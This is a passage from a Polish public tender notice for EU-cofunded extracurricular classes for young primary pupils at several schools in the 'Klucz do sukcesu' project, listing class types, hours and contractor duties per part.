<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej mieszczącej się przy Zespole Szkół Ogólnokształcących w Natolinie; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki 
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych- 30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
 Zajęcia rozwijające zainteresowania  dla dzieci szczególnie uzdolnionych z języka angielskiego 30h w ciągu roku szkol. 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów wybitnie  uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w I części zamówienia.
Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia przed rozpoczęciem lub po zakończeniu obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do dnia wskazanego w danej części zamówienia. Mając na względzie dobro uczniów, będących uczestnikami powyższych projektów należy uwzględnić możliwość przesunięcia zajęć w miejsce nieplanowanego -okienka- między zajęciami uczniów w przypadku nieplanowanej nieobecności nauczyciela na planowanych (wynikających z planu nauczania) zajęciach. 
2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i harmonogramu, a następnie przedstawienia do akceptacji Dyrektorowi Szkoły i koordynatorowi projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu. Wzór harmonogramu będzie opracowany przez koordynatora projektu. b) Obowiązkiem Wykonawcy jest prowadzenie zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U. z 2002 Nr 46, poz. 432 ze zm.). Uwagi dodatkowe: program dostosowany jest do potrzeb i poziomu  uczniów (zgodnie z przeprowadzoną diagnozą) nie przewyższający ich możliwości, uwzględniający aktualną wiedzę, czas zajęć musi być maksymalnie wykorzystany. 
3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności uczestników zajęć). 
4. Sporządzanie dwóch opinii o uczniach na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów w celu oceny skuteczności prowadzonych (na początku i na końcu projektu)  
5. Przeprowadzenie testów sprawdzających poziom wiedzy uczestników/czek po zrealizowaniu 60% h zajęć.
6. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb w odniesieniu do problematyki projektu i jego uczestników.
7. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu. 
8. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
9. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy. 
10. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów w czasie trwania zajęć, jakość i terminowość prowadzonych zajęć oraz szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
11. Dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni/sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu. 
12. Współdziałanie z Dyrektorem Szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzonymi zajęciami. Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji spotkań w ramach zajęć, a także organizowanych imprez. 
13. Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. nr 101 poz. 926 ze zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024). 
14. Wspomaganie promocji i ewaluacji Projektów - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. 
15. Przestrzeganie wytycznych dotyczących oznaczenia Projektu w ramach POKL. 
16. Realizacja indywidualnych programów zajęć ukierunkowanych na realizację celów Projektu. 
Wynagrodzenie będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy osób prowadzących zajęcia w trakcie roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi edukacyjne dla uczniów ZSO w Jedlni-Letnisko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej mieszczącej się przy Zespole Szkół Ogólnokształcących w Jedlni-Letnisko; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki 
Zajęcia logopedyczne dla dzieci z zaburzeniami  rozwoju mowy-60h w ciągu roku szkolnego 2013/14, 2 grupy. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 60 godzin - 15 godzin w 2013 r. i 45 godzin w 2014 r
Gimnastyka korekcyjna dla dzieci z wadami postawy-30h w ciągu roku szkolnego 2013/14, 1 grupa Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z języka angielskiego-60h w ciągu roku szkolnego 2013/14, 2 grupy. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 60 godzin - 15 godzin w 2013 r. i 45 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystycznie orgiami -60h ciągu roku szkolnego 2013/14, 2 grupy. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 60 godzin - 15 godzin w 2013 r. i 45 godzin w 2014 r
Łączna ilość godzin do zrealizowania 240 w II części zamówienia.
Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia przed rozpoczęciem lub po zakończeniu obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do dnia wskazanego w danej części zamówienia. Mając na względzie dobro uczniów, będących uczestnikami powyższych projektów należy uwzględnić możliwość przesunięcia zajęć w miejsce nieplanowanego -okienka- między zajęciami uczniów w przypadku nieplanowanej nieobecności nauczyciela na planowanych (wynikających z planu nauczania) zajęciach. 
2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i harmonogramu, a następnie przedstawienia do akceptacji Dyrektorowi Szkoły i koordynatorowi projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu. Wzór harmonogramu będzie opracowany przez koordynatora projektu. b) Obowiązkiem Wykonawcy jest prowadzenie zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U. z 2002 Nr 46, poz. 432 ze zm.). Uwagi dodatkowe: program dostosowany jest do potrzeb i poziomu  uczniów (zgodnie z przeprowadzoną diagnozą) nie przewyższający ich możliwości, uwzględniający aktualną wiedzę, czas zajęć musi być maksymalnie wykorzystany. 
3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności uczestników zajęć). 
4. Sporządzanie dwóch opinii o uczniach na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów w celu oceny skuteczności prowadzonych (na początku i na końcu projektu)  
5. Przeprowadzenie testów sprawdzających poziom wiedzy uczestników/czek po zrealizowaniu 60% h zajęć.
6. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb w odniesieniu do problematyki projektu i jego uczestników.
7. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu. 
8. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
9. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy. 
10. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów w czasie trwania zajęć, jakość i terminowość prowadzonych zajęć oraz szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
11. Dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni/sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu. 
12. Współdziałanie z Dyrektorem Szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzonymi zajęciami. Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji spotkań w ramach zajęć, a także organizowanych imprez. 
13. Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. nr 101 poz. 926 ze zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024). 
14. Wspomaganie promocji i ewaluacji Projektów - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. 
15. Przestrzeganie wytycznych dotyczących oznaczenia Projektu w ramach POKL. 
16. Realizacja indywidualnych programów zajęć ukierunkowanych na realizację celów Projektu. 
Wynagrodzenie będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy osób prowadzących zajęcia w trakcie roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi edukacyjne dla uczniów ZSO w Myśliszewicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej mieszczącej się przy Zespole Szkół Ogólnokształcących w Myśliszewicach; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki
Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r


Zajęcia dla dzieci uzdolnionych artystycznie teatr-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych- 30h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia logopedyczne dla dzieci z zaburzeniami  rozwoju mowy-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w III części zamówienia
Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia przed rozpoczęciem lub po zakończeniu obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do dnia wskazanego w danej części zamówienia. Mając na względzie dobro uczniów, będących uczestnikami powyższych projektów należy uwzględnić możliwość przesunięcia zajęć w miejsce nieplanowanego -okienka- między zajęciami uczniów w przypadku nieplanowanej nieobecności nauczyciela na planowanych (wynikających z planu nauczania) zajęciach. 
2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i harmonogramu, a następnie przedstawienia do akceptacji Dyrektorowi Szkoły i koordynatorowi projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu. Wzór harmonogramu będzie opracowany przez koordynatora projektu. b) Obowiązkiem Wykonawcy jest prowadzenie zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U. z 2002 Nr 46, poz. 432 ze zm.). Uwagi dodatkowe: program dostosowany jest do potrzeb i poziomu  uczniów (zgodnie z przeprowadzoną diagnozą) nie przewyższający ich możliwości, uwzględniający aktualną wiedzę, czas zajęć musi być maksymalnie wykorzystany. 
3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności uczestników zajęć). 
4. Sporządzanie dwóch opinii o uczniach na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów w celu oceny skuteczności prowadzonych (na początku i na końcu projektu)  
5. Przeprowadzenie testów sprawdzających poziom wiedzy uczestników/czek po zrealizowaniu 60% h zajęć.
6. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb w odniesieniu do problematyki projektu i jego uczestników.
7. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu. 
8. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
9. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy. 
10. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów w czasie trwania zajęć, jakość i terminowość prowadzonych zajęć oraz szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
11. Dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni/sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu. 
12. Współdziałanie z Dyrektorem Szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzonymi zajęciami. Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji spotkań w ramach zajęć, a także organizowanych imprez. 
13. Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. nr 101 poz. 926 ze zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024). 
14. Wspomaganie promocji i ewaluacji Projektów - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. 
15. Przestrzeganie wytycznych dotyczących oznaczenia Projektu w ramach POKL. 
16. Realizacja indywidualnych programów zajęć ukierunkowanych na realizację celów Projektu. 
Wynagrodzenie będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy osób prowadzących zajęcia w trakcie roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi edukacyjne dla uczniów Szkoły Podstawowej w Słupicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej w Słupicy; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki
Zajęcia logopedyczne dla dzieci z zaburzeniami  rozwoju mowy-40h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 5 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 40 godzin - 10 godzin w 2013 r. i 30 godzin w 2014 r
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej-40h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 5 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 40 godzin - 10 godzin w 2013 r. i 30 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów wybitnie  uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych-40h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 5 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 40 godzin - 10 godzin w 2013 r. i 30 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w IV części zamówienia
Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia przed rozpoczęciem lub po zakończeniu obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do dnia wskazanego w danej części zamówienia. Mając na względzie dobro uczniów, będących uczestnikami powyższych projektów należy uwzględnić możliwość przesunięcia zajęć w miejsce nieplanowanego -okienka- między zajęciami uczniów w przypadku nieplanowanej nieobecności nauczyciela na planowanych (wynikających z planu nauczania) zajęciach. 
2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i harmonogramu, a następnie przedstawienia do akceptacji Dyrektorowi Szkoły i koordynatorowi projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu. Wzór harmonogramu będzie opracowany przez koordynatora projektu. b) Obowiązkiem Wykonawcy jest prowadzenie zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U. z 2002 Nr 46, poz. 432 ze zm.). Uwagi dodatkowe: program dostosowany jest do potrzeb i poziomu  uczniów (zgodnie z przeprowadzoną diagnozą) nie przewyższający ich możliwości, uwzględniający aktualną wiedzę, czas zajęć musi być maksymalnie wykorzystany. 
3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności uczestników zajęć). 
4. Sporządzanie dwóch opinii o uczniach na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów w celu oceny skuteczności prowadzonych (na początku i na końcu projektu)  
5. Przeprowadzenie testów sprawdzających poziom wiedzy uczestników/czek po zrealizowaniu 60% h zajęć.
6. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb w odniesieniu do problematyki projektu i jego uczestników.

7. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu. 
8. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
9. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy. 
10. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów w czasie trwania zajęć, jakość i terminowość prowadzonych zajęć oraz szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
11. Dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni/sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu. 
12. Współdziałanie z Dyrektorem Szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzonymi zajęciami. Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji spotkań w ramach zajęć, a także organizowanych imprez. 
13. Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. nr 101 poz. 926 ze zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024). 
14. Wspomaganie promocji i ewaluacji Projektów - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. 
15. Przestrzeganie wytycznych dotyczących oznaczenia Projektu w ramach POKL. 
16. Realizacja indywidualnych programów zajęć ukierunkowanych na realizację celów Projektu. 
Wynagrodzenie będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy osób prowadzących zajęcia w trakcie roku szkolnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> usługa edukacyjna dla uczniów Szkoły Podstawowej w Gzowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej w Gzowicach; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki



Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji- 30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystycznie teatr -30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w V części zamówienia.
Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia przed rozpoczęciem lub po zakończeniu obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do dnia wskazanego w danej części zamówienia. Mając na względzie dobro uczniów, będących uczestnikami powyższych projektów należy uwzględnić możliwość przesunięcia zajęć w miejsce nieplanowanego -okienka- między zajęciami uczniów w przypadku nieplanowanej nieobecności nauczyciela na planowanych (wynikających z planu nauczania) zajęciach. 
